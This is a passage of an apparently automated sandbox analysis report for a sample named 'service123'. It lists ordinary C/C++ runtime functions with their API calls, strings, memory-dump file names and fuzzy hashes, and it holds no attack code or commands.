Function 6C332940 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,6C32711E), ref: 6C3329B3

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C332AC4, 6C332B21, 6C332B86
basic_string::_M_create, xrefs: 6C3329CA, 6C332A6A
string::string, xrefs: 6C332B7E
basic_string::basic_string, xrefs: 6C332ABC, 6C332B19

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 3510742995-126128797
Opcode ID: 41917ef368c081a5cafaf61899f3f7f2e05246a34c88ed364571c4e14597f4e3
Instruction ID: fe64e0cbd7e7112c30d1008e1c6e41c11b5ea19ad2fb24ba5c7cd40eced55d36
Opcode Fuzzy Hash: 41917ef368c081a5cafaf61899f3f7f2e05246a34c88ed364571c4e14597f4e3
Instruction Fuzzy Hash: 047161B69093608FC310DF2CD58064AFBE0BF89218F55899EE88C9B716D336D945CF92

Function 6C29EB70 Relevance: 9.2, APIs: 6, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction ID: cebd841eb359571f64a1758c47b15a147053c567b73bd1c33a21bee36f947044
Opcode Fuzzy Hash: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction Fuzzy Hash: 0E619B7560930ACFC714CF1AC48065AB7E5BF89318F448A2EFCD89BB54E730D9468B96

Function 6C2AAE10 Relevance: 9.1, APIs: 6, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2AACEF), ref: 6C365FF0
abort.MSVCRT(?,?,?,?,?,?,6C2AAC4C,?,?,?,?,?,?,6C366040), ref: 6C365FF8
abort.MSVCRT(?,?,?,?,?,?,6C2AAC4C,?,?,?,?,?,?,6C366040), ref: 6C366000
abort.MSVCRT(?,?,?,?,?,?,6C2AAC4C,?,?,?,?,?,?,6C366040), ref: 6C366008

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 4688530f94562fc09c53394e347bf37be3bb3528aa35c05cc767b08a83402853
Instruction ID: bc5208257a6481d70ef6c3e5b169c39b08a37a00b02aa3ed1c9a3d7a5c83a93f
Opcode Fuzzy Hash: 4688530f94562fc09c53394e347bf37be3bb3528aa35c05cc767b08a83402853
Instruction Fuzzy Hash: EF41F271648309CBD744AFA5C4816EAB7E1AF8230CF14487DD9858BF19DB36944ACFA2

Function 6C291020 Relevance: 9.1, APIs: 6, Instructions: 100sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,6C291281,?,?,?,?,?,?,6C2913AE), ref: 6C291057
_amsg_exit.MSVCRT ref: 6C291086

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: d10e88fb894e3897fd0152eb25b74ffe29964383a66fc22f3e6791f403222998
Instruction ID: 13d642882097013503ce19f6212bbd005f3fcc7ae6d19b46e54b6052c0140888
Opcode Fuzzy Hash: d10e88fb894e3897fd0152eb25b74ffe29964383a66fc22f3e6791f403222998
Instruction Fuzzy Hash: DD319E7070824A8BDB00AF6BC58179A77FCFB56388F11452AED448BB40DB32C584DBA2

Function 6C2B1CB0 Relevance: 9.0, APIs: 6, Instructions: 50stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C2B1CC8
strlen.MSVCRT ref: 6C2B1CD2
memcpy.MSVCRT ref: 6C2B1CEF
setlocale.MSVCRT ref: 6C2B1D02
wcsftime.MSVCRT ref: 6C2B1D26
setlocale.MSVCRT ref: 6C2B1D38

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlenwcsftime
String ID:
API String ID: 3412479102-0
Opcode ID: 8c65a748b42de41f578bf91926d0288165d34402882559e46b9e4ad73c507734
Instruction ID: f54c7e6f835ac946a99c8b7db52fcba8b06c6cad49c544d0f3f37e6c667a45fc
Opcode Fuzzy Hash: 8c65a748b42de41f578bf91926d0288165d34402882559e46b9e4ad73c507734
Instruction Fuzzy Hash: 3511C5B06093149FC340BFAAC08475EBBE4BF88744F418C2EE8C987711E7799855CB92

Function 6C2B1A00 Relevance: 9.0, APIs: 6, Instructions: 49stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C2B1A18
strlen.MSVCRT ref: 6C2B1A22
memcpy.MSVCRT ref: 6C2B1A3F
setlocale.MSVCRT ref: 6C2B1A52
strftime.MSVCRT ref: 6C2B1A76
setlocale.MSVCRT ref: 6C2B1A88

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: setlocale$memcpystrftimestrlen
String ID:
API String ID: 1843691881-0
Opcode ID: 5921bce16b2b149da0e5d95dd047887597348383fbd26cb02bf93ddb50e0a5a7
Instruction ID: f5b9853c031201eb0e6ce76d69ba9c70df2be25450e9a2b353a6d0555a6fc318
Opcode Fuzzy Hash: 5921bce16b2b149da0e5d95dd047887597348383fbd26cb02bf93ddb50e0a5a7
Instruction Fuzzy Hash: 1311D6B06093149FC340BFA9C08475EBBE4BF84744F458C2EE8C987701D7759855CB92

Function 6C29ED31 Relevance: 9.0, APIs: 6, Instructions: 19COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction ID: 11e07256a151773ac2e6e5b29fd57a3b58423c7c1c2c802e49bd9465fce339ea
Opcode Fuzzy Hash: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction Fuzzy Hash: BEB01231DC826DC6C42075FF40103DAB22DAB03388F00080BCD96A3C0EC633A0D7495A

Function 6C2ADE80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 6C2ADEC7
LocalFree.KERNEL32 ref: 6C2ADEFB

Strings

basic_string: construction from null is not valid, xrefs: 6C2ADF57
Unknown error code, xrefs: 6C2ADF3C

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: Unknown error code$basic_string: construction from null is not valid
API String ID: 1427518018-3299438129
Opcode ID: ed4a050e9334504627dc8d48fecadbae736682f5dddfb7b3bb839f698a71533f
Instruction ID: 87784c4210d6c54da8a220263d49c185035d17409c8ff4a6acde98a5d3d610e0
Opcode Fuzzy Hash: ed4a050e9334504627dc8d48fecadbae736682f5dddfb7b3bb839f698a71533f
Instruction Fuzzy Hash: 674158B29087059FCB00AF6AC48569EFBF4EF85314F40882CE9C59BB14D73494498FA7

Function 008F2F89 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 008F2E97
fputc.MSVCRT ref: 008F2F07
memset.MSVCRT ref: 008F2FC2

Strings

0, xrefs: 008F2FB7
o, xrefs: 008F2FCA

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction ID: 59bfb1a9bdec47855dae52be1d862dbb01954cd8011d28b809b52fac7096709d
Opcode Fuzzy Hash: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction Fuzzy Hash: 4531397190460DCBDB10CF68C0947AABBF1FF58310F258629DA95EB352E738A900CB54

Function 6C2A3659 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C2A3567
fputc.MSVCRT ref: 6C2A35D7
memset.MSVCRT ref: 6C2A3692

Strings

o, xrefs: 6C2A369A
0, xrefs: 6C2A3687

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction ID: cc33b957535859afb4e1abc0e76a4f2c7be86db9752ae1471b566080ffb23a1b
Opcode Fuzzy Hash: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction Fuzzy Hash: A3312C71A083098FC700DFA9C0947AABBF1BF48355F158659E995ABB51E734E806CF50

Function 6C299490 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 375stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 6C2994C2
strlen.MSVCRT ref: 6C299616

Strings

_GLOBAL_, xrefs: 6C2994B7

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: strlenstrncmp
String ID: _GLOBAL_
API String ID: 1310274236-770460502
Opcode ID: 9ebd293af37a658c150e8b40676054b7118a8be6fa667ac856120fc04105a1c0
Instruction ID: c40a6894775a04db47584b0092568d18a35fbcb374630ec4aaa073f0af3219ed
Opcode Fuzzy Hash: 9ebd293af37a658c150e8b40676054b7118a8be6fa667ac856120fc04105a1c0
Instruction Fuzzy Hash: F5F18DB0D0521D8FEB20DF2AC8903DDBBF5AF46318F0441AAD84CAB645D7759A99CF81

Function 6C30D860 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 229COMMON

Download Yara Rule

APIs

Part of subcall function 6C32F670: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C30D7DE), ref: 6C32F70D
Part of subcall function 6C32F670: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C30D7DE), ref: 6C32F738

memcpy.MSVCRT ref: 6C30DA65

Part of subcall function 6C3322E0: memcpy.MSVCRT(?,-00000001,?,6C2B724E,?,?,?,?,?,?,?,?,?,?,?,6C2B8BD5), ref: 6C33231C

Strings

iostream error, xrefs: 6C30DAB8
basic_string::append, xrefs: 6C30DB62, 6C30DB6E
Unknown error, xrefs: 6C30D8B8

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: Unknown error$basic_string::append$iostream error
API String ID: 1283327689-1474074352
Opcode ID: e9b0874f547a12037abe474942d3e054e620159bccdc662bd455970a2d138ffe
Instruction ID: 4dc6168ed60c4fb41253dd52126a5a67965a09c8e7c48fcc202c8a5433f57890
Opcode Fuzzy Hash: e9b0874f547a12037abe474942d3e054e620159bccdc662bd455970a2d138ffe
Instruction Fuzzy Hash: 36A10276E04318CBCB10DFA8C48469DBBF5BF48314F20892ED899ABB55D735A845CF92

Function 6C2FBD10 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 216COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C2FBDEF
memcpy.MSVCRT ref: 6C2FBE49
memcpy.MSVCRT ref: 6C2FBED7

Part of subcall function 6C2FC2B0: memcpy.MSVCRT ref: 6C2FC33C

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C2FBF63
basic_string::replace, xrefs: 6C2FBF44, 6C2FBF57

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: 0695a065452a04580d0a7d940dab261493c3d2b6de3958a775b38a9da8693605
Instruction ID: 4a7aafeeb2eb90df1676bfd3f74d8836228a92ce79ef8ecb11cdd93bf8263169
Opcode Fuzzy Hash: 0695a065452a04580d0a7d940dab261493c3d2b6de3958a775b38a9da8693605
Instruction Fuzzy Hash: 74814475A4561D9FCB00DF29C480A9EFBE1FF88314F11892AE8A8C7714D730D956CB92

Function 6C304DB0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C304E80
memcpy.MSVCRT ref: 6C304ED4
memcpy.MSVCRT ref: 6C304F68

Part of subcall function 6C305340: memcpy.MSVCRT ref: 6C3053D0

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C304FF8
basic_string::replace, xrefs: 6C304FD9, 6C304FEC

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: f172fbf1c337cd5bcf257bf210cd54e9bf8867c6773185dae03f7d9279cc9c58
Instruction ID: d77d60d403badc004364980b1ddfead5fe77a8cca66aec3390d69374af8130b6
Opcode Fuzzy Hash: f172fbf1c337cd5bcf257bf210cd54e9bf8867c6773185dae03f7d9279cc9c58
Instruction Fuzzy Hash: 2A814776B082059FCB00DF6DC48069EBBF5AF88258F10892EE898D7B14D731E954CF92

Function 6C30D5C0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 153stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C32F670: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C30D7DE), ref: 6C32F70D
Part of subcall function 6C32F670: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C30D7DE), ref: 6C32F738

strlen.MSVCRT ref: 6C30D695
memcpy.MSVCRT ref: 6C30D76E

Strings

iostream error, xrefs: 6C30D7C2
Unknown error, xrefs: 6C30D60E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: memcpy$memmovestrlen
String ID: Unknown error$iostream error
API String ID: 1234831610-3609051425
Opcode ID: 5e561d14d332813010eaa9f9239913b1580a69c2414274935d1bb413cad68d1f
Instruction ID: 9d88a0ff94f5747719e0454f553e26e0705879e14af504380dc7ab62afbdad12
Opcode Fuzzy Hash: 5e561d14d332813010eaa9f9239913b1580a69c2414274935d1bb413cad68d1f
Instruction Fuzzy Hash: 7961D5B5A043089FCB04DFA9C08479EBBF1BF48314F10852ED4999B755E7759845CF92

Function 6C29F840 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C29F85F
ReleaseSemaphore.KERNEL32 ref: 6C29F8E3

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: ReleaseSemaphoremalloc
String ID:
API String ID: 755742884-0
Opcode ID: 71b7a033a35ab984649cd29aeb63de395ca7a744b92f1de69fa52490e72cc11c
Instruction ID: 8dac402ddecb7a56b13ff0a1f716acce2995f16a32fe9712a5731ec887388788
Opcode Fuzzy Hash: 71b7a033a35ab984649cd29aeb63de395ca7a744b92f1de69fa52490e72cc11c
Instruction Fuzzy Hash: 5A315A70A093059FEB40DF2AC5487977BF8FB56319F15825DE8984B390D334D449CBA6

Function 6C29FCE0 Relevance: 7.6, APIs: 5, Instructions: 78synchronizationCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C29FCEC
ReleaseSemaphore.KERNEL32 ref: 6C29FD7C
CreateSemaphoreW.KERNEL32 ref: 6C29FDC7
WaitForSingleObject.KERNEL32 ref: 6C29FE10

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWaitmalloc
String ID:
API String ID: 2768075653-0
Opcode ID: 55781c4551f9fc4960f1e8b5f480cf70b5a9e9bb7e71c4e68c83a988dcb34dd4
